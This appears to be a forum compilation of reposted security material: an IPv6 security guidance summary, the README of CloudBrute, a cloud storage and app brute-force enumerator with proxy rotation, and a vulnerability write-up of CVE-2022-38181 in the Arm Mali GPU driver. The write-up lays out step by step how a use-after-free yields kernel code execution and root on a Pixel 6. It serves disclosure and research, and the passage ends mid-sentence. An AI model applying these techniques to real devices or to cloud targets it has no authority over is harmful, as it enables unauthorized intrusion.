  12. Executive summary Nearly all networked devices use the Internet Protocol (IP) for their communications. IP version 6 (IPv6) is the current version of IP and provides advantages over the legacy IP version 4 (IPv4). Most notably, the IPv4 address space is inadequate to support the increasing number of networked devices requiring routable IP addresses, whereas IPv6 provides a vast address space to meet current and future needs. While some technologies, such as network infrastructure, are more affected by IPv6 than others, nearly all networked hardware and software are affected in some way as well. As a result, IPv6 has broad impact on cybersecurity that organizations should address with due diligence. IPv6 security issues are quite similar to those from IPv4. That is, the security methods used with IPv4 should typically be applied to IPv6 with adaptations as required to address the differences with IPv6. Security issues associated with an IPv6 implementation will generally surface in networks that are new to IPv6, or in early phases of the IPv6 transition. These networks lack maturity in IPv6 configurations and network security tools. More importantly, they lack overall experience by the administrators in the IPv6 protocol. Dual stacked networks (that run both IPv4 and IPv6 simultaneously) have additional security concerns, so further countermeasures are needed to mitigate these risks due to the increased attack surface of having both IPv4 and IPv6. Download: https://media.defense.gov/2023/Jan/18/2003145994/-1/-1/0/CSI_IPV6_SECURITY_GUIDANCE.PDF
  13. CloudBrute A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike. The complete writeup is available. here At a glance Motivation While working on HunterSuite, and as part of the job, we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers. Here is the list issues we tried to fix: separated wordlists lack of proper concurrency lack of supporting all major cloud providers require authentication or keys or cloud CLI access outdated endpoints and regions Incorrect file storage detection lack support for proxies (useful for bypassing region restrictions) lack support for user agent randomization (useful for bypassing rare restrictions) hard to use, poorly configured Features Cloud detection (IPINFO API and Source Code) Supports all major providers Black-Box (unauthenticated) Fast (concurrent) Modular and easily customizable Cross Platform (windows, linux, mac) User-Agent Randomization Proxy Randomization (HTTP, Socks5) Supported Cloud Providers Microsoft: Storage Apps Amazon: Storage Apps Google: Storage Apps DigitalOcean: storage Vultr: Storage Linode: Storage Alibaba: Storage Version 1.0.0 Usage Just download the latest release for your operation system and follow the usage. To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there. It looks like this providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations proxytype: "http" # socks5 / http ipinfo: "" # IPINFO.io API KEY For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc. We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool. After setting up your API key, you are ready to use CloudBrute. ██████╗██╗ ██████╗ ██╗ ██╗██████╗ ██████╗ ██████╗ ██╗ ██╗████████╗███████╗ ██╔════╝██║ ██╔═══██╗██║ ██║██╔══██╗██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝ ██║ ██║ ██║ ██║██║ ██║██║ ██║██████╔╝██████╔╝██║ ██║ ██║ █████╗ ██║ ██║ ██║ ██║██║ ██║██║ ██║██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ ╚██████╗███████╗╚██████╔╝╚██████╔╝██████╔╝██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗ ╚═════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝ V 1.0.7 usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>" -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads <integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"] [-a|--randomagent "<value>"] [-D|--debug] [-q|--quite] [-m|--mode "<value>"] [-o|--output "<value>"] [-C|--configFolder "<value>"] Awesome Cloud Enumerator Arguments: -h --help Print help information -d --domain domain -k --keyword keyword used to generator urls -w --wordlist path to wordlist -c --cloud force a search, check config.yaml providers list -t --threads number of threads. Default: 80 -T --timeout timeout per request in seconds. Default: 10 -p --proxy use proxy list -a --randomagent user agent randomization -D --debug show debug logs. Default: false -q --quite suppress all output. Default: false -m --mode storage or app. Default: storage -o --output Output file. Default: out.txt -C --configFolder Config path. Default: config for example CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt" please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments If a cloud provider not detected or want force searching on a specific provider, you can use -c option. CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt Dev Clone the repo go build -o CloudBrute main.go go test internal in action How to contribute Add a module or fix something and then pull request. Share it with whomever you believe can use it. Do the extra work and share your findings with community ♥ FAQ How to make the best out of this tool? Read the usage. I get errors; what should I do? Make sure you read the usage correctly, and if you think you found a bug open an issue. When I use proxies, I get too many errors, or it's too slow? It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider. too fast or too slow ? change -T (timeout) option to get best results for your run. Credits Inspired by every single repo listed here . Sursa: https://github.com/0xsha/CloudBrute
      • 4
      • Upvote
      • Thanks
  14. Pwning the all Google phone with a non-Google bug It turns out that the first “all Google” phone includes a non-Google bug. Learn about the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU. Join me on my journey through reporting the vulnerability to the Android security team, and the exploit that used this vulnerability to gain arbitrary kernel code execution and root on a Pixel 6 from an Android app. Author Man Yue Mo January 23, 2023 The “not-Google” bug in the “all-Google” phone The year is 2021 A.D. The first “all Google” phone, the Pixel 6 series, made entirely by Google, is launched. Well not entirely… One small GPU chip still holds out. And life is not easy for security researchers who audit the fortified camps of Midgard, Bifrost, and Valhall.1 An unfortunate security researcher was about to learn this the hard way as he wandered into the Arm Mali regime: CVE-2022-38181 In this post I’ll cover the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU that I reported to the Android security team on 2022-07-12 along with a proof-of-concept exploit that used this vulnerability to gain arbitrary kernel code execution and root privileges on a Pixel 6 from an Android app. The bug was assigned bug ID 238770628. After initially rating it as a High-severity vulnerability, the Android security team later decided to reclassify it as a “Won’t fix” and they passed my report to Arm’s security team. I was eventually able to get in touch with Arm’s security team to independently follow up on the issue. The Arm security team were very helpful throughout and released a public patch in version r40p0 of the driver on 2022-10-07 to address the issue, which was considerably quicker than similar disclosures that I had in the past on Android. A coordinated disclosure date of around mid-November was also agreed to allow time for users to apply the patch. However, I was unable to connect with the Android security team and the bug was quietly fixed in the January update on the Pixel devices as bug 259695958. Neither the CVE ID, nor the bug ID (the original 238770628 and the new 259695958) were mentioned in the security bulletin. Our advisory, including the disclosure timeline, can be found here. The Arm Mali GPU The Arm Mali GPU is a “device-specific” hardware component which can be integrated into various devices, ranging from Android phones to smart TV boxes. For example, all of the international versions of the Samsung S series phones, up to S21 use the Mali GPU, as well as the Pixel 6 series. For additional examples, see “implementations” in Mali(GPU) Wikipedia entry for some specific devices that use the Mali GPU. As explained in my other post, GPU drivers on Android are a very attractive target for an attacker, as they can be reached directly from the untrusted app domain and most Android devices use either Qualcomm’s Adreno GPU, or the Arm Mali GPU, meaning that relatively few bugs can cover a large number of devices. In fact, of the seven Android 0-days that were detected as exploited in the wild in 2021– five targeted GPU drivers. Another more recent bug that was exploited in the wild – CVE-2021-39793, disclosed in March 2022 – also targeted a GPU driver. Together, of these six bugs that were exploited in the wild that targeted Android GPU drivers, three bugs targeted the Qualcomm GPU, while the other three targeted the Arm Mali GPU. Due to the complexity involved in managing memory sharing between user space applications and the GPU, many of the vulnerabilities in the Arm Mali GPU involve the memory management code. The current vulnerability is another example of this, and involves a special type of GPU memory: the JIT memory. Contrary to the name, JIT memory does not seem to be related to JIT compiled code, as it is created as non-executable memory. Instead, it seems to be used for memory caches, managed by the GPU kernel driver, that can readily be shared with user applications and returned to the kernel when memory pressure arises. Many other types of GPU memory are created directly using ioctl calls like KBASE_IOCTL_MEM_IMPORT. (See, for example, the section “Memory management in the Mali kernel driver” in my previous post.) This, however, is not the case for JIT memory regions, which are created by submitting a special GPU instruction using the KBASE_IOCTL_JOB_SUBMIT ioctl call. The KBASE_IOCTL_JOB_SUBMIT ioctl can be used to submit a “job chain” to the GPU for processing. Each job chain is basically a list of jobs, which are opaque data structures that contain job headers, followed by payloads that contain the specific instructions. For an example, see the Writing to GPU memory section in my previous post. While the KBASE_IOCTL_JOB_SUBMIT is normally used for sending instructions to the GPU itself, there are also some jobs that are implemented in the kernel and run on the host (CPU) instead. These are the software jobs (“softjobs”) and among them are jobs that instruct the kernel to allocate and free JIT memory (BASE_JD_REQ_SOFT_JIT_ALLOC and BASE_JD_REQ_SOFT_JIT_FREE). The life cycle of JIT memory While KBASE_IOCTL_JOB_SUBMIT is a general purpose ioctl call and contains code paths that are responsible for handling different types of GPU jobs, the BASE_JD_REQ_SOFT_JIT_ALLOC job essentially calls kbase_jit_allocate_process, which then calls kbase_jit_allocate to create a JIT memory region. To understand the lifetime and usage of JIT memory, let me first introduce a few different concepts. When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle. In particular, it has three list_head fields that are responsible for managing JIT memory: the jit_active_head, the jit_pool_head, and the jit_destroy_head. As their names suggest, jit_active_head contains memory that is still in use by the user application, jit_pool_head contains memory regions that are not in use, and jit_destroy_head contains memory regions that are pending to be freed and returned to the kernel. Although both jit_pool_head and jit_destroy_head are used to manage JIT regions that are free, jit_pool_head acts like a memory pool and contains JIT regions that are intended to be reused when new JIT regions are allocated, while jit_destroy_head contains regions that are going to be returned to the kernel. When kbase_jit_allocate is called, it’ll first try to find a suitable region in the jit_pool_head: if (info->usage_id != 0) /* First scan for an allocation with the same usage ID */ reg = find_reasonable_region(info, &kctx->jit_pool_head, false); ... if (reg) { ... list_move(&reg->jit_node, &kctx->jit_active_head); If a suitable region is found, then it’ll be moved to jit_active_head, indicating that it is now in use in userland. Otherwise, a memory region will be created and added to the jit_active_head instead. The region allocated by kbase_jit_allocate, whether it is newly created or reused from jit_pool_head, is then stored in the jit_alloc array of the kbase_context by kbase_jit_allocate_process. When the user no longer needs the JIT memory, it can send a BASE_JD_REQ_SOFT_JIT_FREE job to the GPU. This then uses kbase_jit_free to free the memory. However, rather than returning the backing pages of the memory region back to the kernel immediately, kbase_jit_free first reduces the backing region to a minimal size and removes any CPU side mapping, so the pages in the region are no longer reachable from the address space of the user process: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... //First reduce the size of the backing region and unmap the freed pages old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { u64 new_size = MAX(reg->initial_commit, div_u64(old_pages * (100 - kctx->trim_level), 100)); u64 delta = old_pages - new_size; //Free delta pages in the region and reduces its size to old_pages - delta if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); mutex_unlock(&kctx->reg_lock); } } ... //Remove the pages from address space of user process kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents); Note that the backing pages of the region (reg) are not completely removed at this stage, and reg is also not going to be freed here. Instead, reg is moved back into jit_pool_head. However, perhaps more interestingly, reg is also moved to the evict_list of the kbase_context: kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents); ... mutex_lock(&kctx->jit_evict_lock); /* This allocation can't already be on a list. */ WARN_ON(!list_empty(&reg->gpu_alloc->evict_node)); //Add reg to evict_list list_add(&reg->gpu_alloc->evict_node, &kctx->evict_list); atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents); //Move reg to jit_pool_head list_move(&reg->jit_node, &kctx->jit_pool_head); After kbase_jit_free completed, its caller, kbase_jit_free_finish, will also clean up the reference stored in jit_alloc when the region was allocated, even though reg is still valid at this stage: static void kbase_jit_free_finish(struct kbase_jd_atom *katom) { ... for (j = 0; j != katom->nr_extres; ++j) { if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) { ... if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) { ... kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]); } kctx->jit_alloc[ids[j]] = NULL; //<--------- clean up reference } } ... } As we’ve seen before, the memory region in the jit_pool_head list may now be reused when the user allocates another JIT region. So this explains jit_pool_head and jit_active_head. What about jit_destroy_head? When JIT memory is freed by calling kbase_jit_free, it is also put on the evict_list. Memory regions in the evict_list are regions that can be freed when memory pressure arises. By putting a JIT region that is no longer in use in the evict_list, the Mali driver can hold onto unused JIT memory for quick reallocation, while returning them to the kernel when the resources are needed. The Linux kernel provides a mechanism to reclaim unused cached memory, called shrinkers. Kernel components, such as drivers, can define a shrinker object, which, amongst other things, involves defining the count_objects and scan_objects methods: struct shrinker { unsigned long (*count_objects)(struct shrinker *, struct shrink_control *sc); unsigned long (*scan_objects)(struct shrinker *, struct shrink_control *sc); ... }; The custom shrinker can then be registered via the register_shrinker method. When the kernel is under memory pressure, it’ll go through the list of registered shrinkers and use their count_objects method to determine potential amount of memory that can be freed, and then use scan_objects to free the memory. In the case of the Mali GPU driver, the shrinker is defined and registered in the kbase_mem_evictable_init method: int kbase_mem_evictable_init(struct kbase_context *kctx) { ... //kctx->reclaim is a shrinker kctx->reclaim.count_objects = kbase_mem_evictable_reclaim_count_objects; kctx->reclaim.scan_objects = kbase_mem_evictable_reclaim_scan_objects; ... register_shrinker(&kctx->reclaim); return 0; } The more interesting part of these methods is the kbase_mem_evictable_reclaim_scan_objects, which is responsible for freeing the memory needed by the kernel. static unsigned long kbase_mem_evictable_reclaim_scan_objects(struct shrinker *s, struct shrink_control *sc) { ... list_for_each_entry_safe(alloc, tmp, &kctx->evict_list, evict_node) { int err; err = kbase_mem_shrink_gpu_mapping(kctx, alloc->reg, 0, alloc->nents); ... kbase_free_phy_pages_helper(alloc, alloc->evicted); ... list_del_init(&alloc->evict_node); ... kbase_jit_backing_lost(alloc->reg); //<------- moves `reg` to `jit_destroy_pool` } ... } This is called to remove cached memory in jit_pool_head and return it to the kernel. The function kbase_mem_evictable_reclaim_scan_objects goes through the evict_list, unmaps the backing pages from the GPU (recall that the CPU mapping is already removed in kbase_jit_free) and then frees the backing pages. It then calls kbase_jit_backing_lost to move reg from jit_pool_head to jit_destroy_head: void kbase_jit_backing_lost(struct kbase_va_region *reg) { ... list_move(&reg->jit_node, &kctx->jit_destroy_head); schedule_work(&kctx->jit_work); } The memory region in jit_destroy_head is then picked up by the kbase_jit_destroy_worker, which then frees the kbase_va_region in jit_destroy_head and removes references to the kbase_va_region entirely. Well not entirely…one small pointer still holds out against the clean up logic. And lifetime management is not easy for the pointers in the fortified camps of the Arm Mali regime. The clean up logic in kbase_mem_evictable_reclaim_scan_objects is not responsible for removing the reference in jit_alloc from when the JIT memory is allocated, but this is not a problem, because as we’ve seen before, this reference was cleared when kbase_jit_free_finish was called to put the region in the evict_list and, normally, a JIT region is only moved to the evict_list when the user frees it via a BASE_JD_REQ_SOFT_JIT_FREE job, which removes the reference stored in jit_alloc. But we don’t do normal things here, nor do the people who seek to compromise devices. The vulnerability While the semantics of memory eviction is closely tied to JIT memory with most eviction functionality referencing “JIT” (for example, the use of kbase_jit_backing_lost in kbase_mem_evictable_reclaim_objects), evictable memory is more general and other types of GPU memory can also be added to the evict_list and be made evictable. This can be achieved by calling kbase_mem_evictable_make to add memory regions to the evict_list and kbase_mem_evictable_unmake to remove memory regions from it. From userspace, these can be called via the KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl. Depending on whether the KBASE_REG_DONT_NEED flag is passed, a memory region can be added or removed from the evict_list: int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr, unsigned int flags, unsigned int mask) { ... prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED; new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED; if (prev_needed != new_needed) { ... if (new_needed) { ... ret = kbase_mem_evictable_make(reg->gpu_alloc); //<------ Add to `evict_list` if (ret) goto out_unlock; } else { kbase_mem_evictable_unmake(reg->gpu_alloc); //<------- Remove from `evict_list` } } By putting a JIT memory region directly in the evict_list and then creating memory pressure to trigger kbase_mem_evictable_reclaim_scan_objects, the JIT region will be freed with a pointer to it still stored in jit_alloc. After that, a BASE_JD_REQ_SOFT_JIT_FREE job can be submitted to trigger kbase_jit_free_finish to use the freed object pointed to in jit_alloc: static void kbase_jit_free_finish(struct kbase_jd_atom *katom) { ... for (j = 0; j != katom->nr_extres; ++j) { if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) { ... if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) { ... kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]); //<----- Use of the now freed jit_alloc[ids[j]] } kctx->jit_alloc[ids[j]] = NULL; } } Amongst other things, kbase_jit_free will first free some of the backing pages in the now freed kctx->jit_alloc[ids[j]]: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { ... u64 delta = old_pages - new_size; if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region mutex_unlock(&kctx->reg_lock); } } So by replacing the freed JIT region with a fake object, I can potentially free arbitrary pages, which is a very powerful primitive. Exploiting the bug As explained before, this bug is triggered when the kernel is under memory pressure and calls kbase_mem_evictable_reclaim_scan_objects via the shrinker mechanism. From a user process, the required memory pressure can be created as simply as mapping a large amount of memory using the mmap system call. However, the exact amount of memory required to trigger the shrinker scanning is uncertain, meaning that there is no guarantee that a shrinker scan will be triggered after such an allocation. While I can try to allocate an excessive amount of memory to ensure that the shrinker scanning is triggered, doing so risks causing an out-of-memory crash and may also cause the object replacement to be unreliable. This causes problems in triggering and exploiting the bug reliably. It would be good if I could allocate memory incrementally and check whether the JIT region is freed by kbase_mem_evictable_reclaim_scan_objects after each allocation step and only proceed with the exploit when I’m sure that the bug has been triggered. The Mali driver provides an ioctl, KBASE_IOCTL_MEM_QUERY for querying properties of memory regions at a specific GPU address. If the address is invalid, the ioctl will fail and return an error. This allows me to check whether the JIT region is freed, because when kbase_mem_evictable_reclaim_scan_objects is called to free the JIT region, it’ll first remove its GPU mappings, making its GPU address invalid. By using the KBASE_IOCTL_MEM_QUERY ioctl to query the GPU address of the JIT region after each allocation, I can therefore check whether the region has been freed by kbase_mem_evictable_reclaim_scan_objects or not, and only start spraying the heap to replace the JIT region when it is actually freed. Moreover, the KBASE_IOCTL_MEM_QUERY ioctl doesn’t involve memory allocation, so it won’t interfere with the object replacement. This makes it perfect for testing whether the bug has been triggered. Although shrinker is a kernel mechanism for freeing up evictable memory, the scanning and removal of evictable objects via shrinkers is actually performed by the process that is requesting the memory. So for example, if my process is mapping some memory to its address space (via mmap and then faulting the pages), and the amount of memory that I am mapping creates sufficient memory pressure that a shrinker scan is triggered, then the shrinker scan and the removal of the evictable objects will be done in the context of my process. This, in particular, means that if I pin my process to a CPU while the shrinker scan is triggered, the JIT region that is removed during the scan will be freed on the same CPU. (Strictly speaking, this is not a hundred percent correct, because the JIT region is actually scheduled to be freed on a worker, but most of the time, the worker is indeed executed immediately on the same CPU.) This helps me to replace the freed JIT region reliably, because when objects are freed in the kernel, they are placed within a per CPU cache, and subsequent object allocations on the same CPU will first be allocated from the CPU cache. This means that, by allocating another object of similar size on the same CPU, I’m likely to be able to replace the freed JIT region. Moreover, the JIT region, which is a kbase_va_region, is actually a rather large object that is allocated in the kmalloc-256 cache, (which is used to allocate objects of size between 256-512 bytes when kmalloc is called) instead of the kmalloc-128 cache, (which allocates objects of size less than 128 bytes), and the kmalloc-256 cache is a less used cache. This, together with the relative certainty of the CPU that frees the JIT region, allows me to reliably replace the JIT region after it is freed. Replacing the freed object Now that I can reliably replace the freed JIT region, I can look at how to exploit the bug. As explained before, the freed JIT memory can be used as the reg argument in the kbase_jit_free function to potentially be used for freeing arbitrary pages: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { ... u64 delta = old_pages - new_size; if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region mutex_unlock(&kctx->reg_lock); } } One possibility is to use the well-known heap spraying technique to replace the freed JIT region with arbitrary data using sendmsg. This would enable me to create a fake kbase_va_region with a fake gpu_alloc and fake pages that could be used to free arbitrary pages in kbase_mem_shrink: int kbase_mem_shrink(struct kbase_context *const kctx, struct kbase_va_region *const reg, u64 new_pages) { ... err = kbase_mem_shrink_gpu_mapping(kctx, reg, new_pages, old_pages); if (err >= 0) { /* Update all CPU mapping(s) */ kbase_mem_shrink_cpu_mapping(kctx, reg, new_pages, old_pages); kbase_free_phy_pages_helper(reg->cpu_alloc, delta); //<------- free pages in cpu_alloc if (reg->cpu_alloc != reg->gpu_alloc) kbase_free_phy_pages_helper(reg->gpu_alloc, delta); //<--- free pages in gpu_alloc In order to do so, I’d need to know the addresses of some data that I can control, so I could create a fake gpu_alloc and its pages field at those addresses. This could be done either by finding a way to leak addresses of kernel objects, or use techniques like the one I wrote about in the Section “The Ultimate fake object store” in my other post. But why use a fake object when you can use a real one? The JIT region that is involved in the use-after-free bug here is a kbase_va_region, which is a complex object that has multiple states. Many operations can only be performed on memory objects with a correct state. In particular, kbase_mem_shrink can only be used on a kbase_va_region that has not been mapped multiple times. The Mali driver provides the KBASE_IOCTL_MEM_ALIAS ioctl that allows multiple memory regions to share the same backing pages. I’ve written about how KBASE_IOCTL_MEM_ALIAS works in more details in my previous post, but for the purpose of this exploit, the crucial point is that KBASE_IOCTL_MEM_ALIAS can be used to create memory regions in the GPU and user address spaces that are aliased to a kbase_va_region, meaning that they are backed by the same physical pages. If a kbase_va_region reg is mapped multiple times by using KBASE_IOCTL_MEM_ALIAS and then has its backing pages freed by kbase_mem_shrink, then only the memory mappings in reg are removed, so the alias regions created by KBASE_IOCTL_MEM_ALIAS can still be used to access the freed backing pages. To prevent kbase_mem_shrink from being called on aliased JIT memory, kbase_mem_alias checks for the KBASE_REG_NO_USER_FREE, so that JIT memory cannot be aliased: u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride, u64 nents, struct base_mem_aliasing_info *ai, u64 *num_pages) { ... for (i = 0; i < nents; i++) { if (ai[i].handle.basep.handle < BASE_MEM_FIRST_FREE_ADDRESS) { if (ai[i].handle.basep.handle != BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE) ... } else { ... if (aliasing_reg->flags & KBASE_REG_NO_USER_FREE) //<-- 2. goto bad_handle; /* JIT regions can't be * aliased. NO_USER_FREE flag * covers the entire lifetime * of JIT regions. The other * types of regions covered * by this flag also shall * not be aliased. ... } Now suppose I trigger the bug and replace the freed JIT region with a normal memory region allocated via the KBASE_IOCTL_MEM_ALLOC ioctl, which is an object of the exact same type, but without the KBASE_REG_NO_USER_FREE flag that is associated with a JIT region. I then use KBASE_IOCTL_MEM_ALIAS to create an extra mapping for the backing store of this new region. All these are valid as I’m just aliasing a normal memory region that does not have the KBASE_REG_NO_USER_FREE flag. However, because of the bug, a dangling pointer in jit_alloc also points to this new region, which has now been aliased. If I now submit a BASE_JD_REQ_SOFT_JIT_FREE job to call kbase_jit_free on this memory, then kbase_mem_shrink will be called, and part of the backing store in this new region will be freed, but the extra mappings created in the aliased region will not be removed, meaning that I can still access the freed backing pages from the alias region. By using a real object of the same type, not only do I save the effort needed to craft a fake object, but it also reduces the risk of having side effects that could result in a crash. The situation is now very similar to what I had in my previous post and the exploit flow from this point on is also very similar. For completeness, I’ll give an overview of how the exploit works here, but readers who are interested can take a look at more details from the Section “Breaking out of the context” onwards in that post. To recap, I now have access to the backing pages in a kbase_va_region object that is already freed and I’d like to reuse these freed backing pages so I can gain read and write access to arbitrary memory. To understand how this can be done, we need to know how backing pages to a kbase_va_region are allocated. When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used: int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages, struct tagged_addr *pages, bool partial_allowed) { ... /* Get pages from this pool */ while (nr_from_pool--) { p = kbase_mem_pool_remove_locked(pool); //<------- 1. ... } ... if (i != nr_4k_pages && pool->next_pool) { /* Allocate via next pool */ err = kbase_mem_pool_alloc_pages(pool->next_pool, //<----- 2. nr_4k_pages - i, pages + i, partial_allowed); ... } else { /* Get any remaining pages from kernel */ while (i != nr_4k_pages) { p = kbase_mem_alloc_page(pool); //<------- 3. ... } ... } ... } The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First the pages are allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool, is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel). When freeing a page, the opposite happens: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context, if the memory pool is full, it’ll try to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator. As noted in my previous post, pool->next_pool is a memory pool managed by the Mali driver and shared by all the kbase_context. It is also used for allocating page table global directories (PGD) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found in my previous post.) As the bottom level PGD stores the physical addresses of the backing pages to GPU virtual memory addresses, being able to write to PGD will allow me to map arbitrary physical pages to the GPU memory, which I can then read from and write to by issuing GPU commands. This gives me access to arbitrary physical memory. As physical addresses for kernel code and static data are not randomized and depend only on the kernel image, I can use this primitive to overwrite arbitrary kernel code and gain arbitrary kernel code execution. In the following figure, the green block indicates the same page being reused as the PGD. To summarize, the exploit involves the following steps: Create JIT memory. Mark the JIT memory as evictable. Increase memory pressure by mapping memory to the user space via normal mmap system calls. Use the KBASE_IOCTL_MEM_QUERY ioctl to check if the JIT memory is freed. Carry on applying memory pressure until the JIT region is freed. Allocate new GPU memory regions using the KBASE_IOCTL_MEM_ALLOC ioctl to replace the freed JIT memory. Create an alias region to the new GPU memory region that replaced the JIT memory so that the backing pages of the new GPU memory are shared with the alias region. Submit a BASE_JD_REQ_SOFT_JIT_FREE job to free the JIT region. As the JIT region is now replaced by the new memory region, this will cause kbase_jit_free to remove the backing pages of the new memory region, but the GPU mappings created in the alias region in step 6. will not be removed. The alias region can now be used to access the freed backing pages. Reuse the freed backing pages as PGD of the kbase_context. The alias region can now be used to rewrite the PGD. I can then map arbitrary physical pages to the GPU address space. Map kernel code to the GPU address space to gain arbitrary kernel code execution, which can then be used to rewrite the credentials of our process to gain root, and to disable SELinux. The exploit for Pixel 6 can be found here with some setup notes. Disclosure and patch gapping At the start of the post, I mentioned that I initially reported this bug to the Android Security team, but it was later dismissed as a “Won’t fix” bug. While it is unclear to me why such a decision was made, it is perhaps worth taking a look at the wider picture instead of treating this as an isolated incident. There has been a long history of N-day vulnerabilities being exploited in the Android kernel, many of which were fixed in the upstream kernel but didn’t get ported to Android. Perhaps the most infamous of these was CVE-2019-2215 (Bad Binder), which was initially discovered by the syzkaller fuzzer in November 2017 and patched in February 2018. However, this fix was never included in an Android monthly security bulletin until it was rediscovered as an exploited in-the-wild bug in September 2019. Another exploited in-the-wild bug, CVE-2021-1048, was introduced in the upstream kernel in December 2020, and was fixed upstream a few weeks later. The patch, however, was not included in the Android Security Bulletin until November 2021, when it was discovered to be exploited in-the-wild. Yet another exploited in-the-wild vulnerability, CVE-2021-0920, was found in 2016 with details visible in a Linux kernel email thread. The report, however, was dismissed by kernel developers at the time, until it was rediscovered to be exploited in-the-wild and patched in November 2021. To be fair, these cases were patched or ignored upstream without being identified as security issues (for example, CVE-2021-0920 was ignored), making it difficult for any vendor to identify such issues before it’s too late. This again shows the importance of properly addressing security issues and recording them by assigning a CVE-ID, so that downstream users can apply the relevant security patches. Unfortunately, vendors sometimes see having security vulnerabilities in their products as a damage to their reputation and try to silently patch or downplay security issues instead. The above examples show just how serious the consequences of such a mentality can be. While Android has made improvements to keep the kernel branches more unified and up-to-date to avoid problems such as CVE-2019-2215, where the vulnerability was patched in some branches but not others, some recent disclosures highlight a rather worrying trend. On March 7th, 2022, CVE-2022-0847 (Dirty pipe) was disclosed publicly, with full details and a proof-of-concept exploit to overwrite read-only files. While the bug was patched upstream on February 23rd, 2022, with the patch merged into the Android kernel on February, 24th, 2022, the patch was not included in the Android Security Bulletin until May 2022 and the public proof-of-concept exploit still ran successfully on a Pixel 6 with the April patch. While this may look like another incident where a security bug was patched silently upstream, this case was very different. According to the disclosure timeline, the bug report was shared with the Android Security Team on February 21st, 2022, a day after it was reported to the Linux kernel. Another vulnerability, CVE-2021-39793 in the Mali driver, was patched by Arm in version r36p0 of the driver (as CVE-2022-22706), which was released on February 11th, 2022. The patch was only included in the Android Security Bulletin in March as an exploited in-the-wild bug. Yet another vulnerability, CVE-2022-20186 that I reported to the Android Security Team on January 15th, 2022, was patched by Arm in version r37p0 of the Mali driver, which was released on April 21st, 2022. The patch was only included in the Android Security Bulletin in June and a Pixel 6 running the May patch was still affected. Taking a look at security issues reported by Google’s Project Zero team, between June and July 2022, Jann Horn of Project Zero reported five security issues 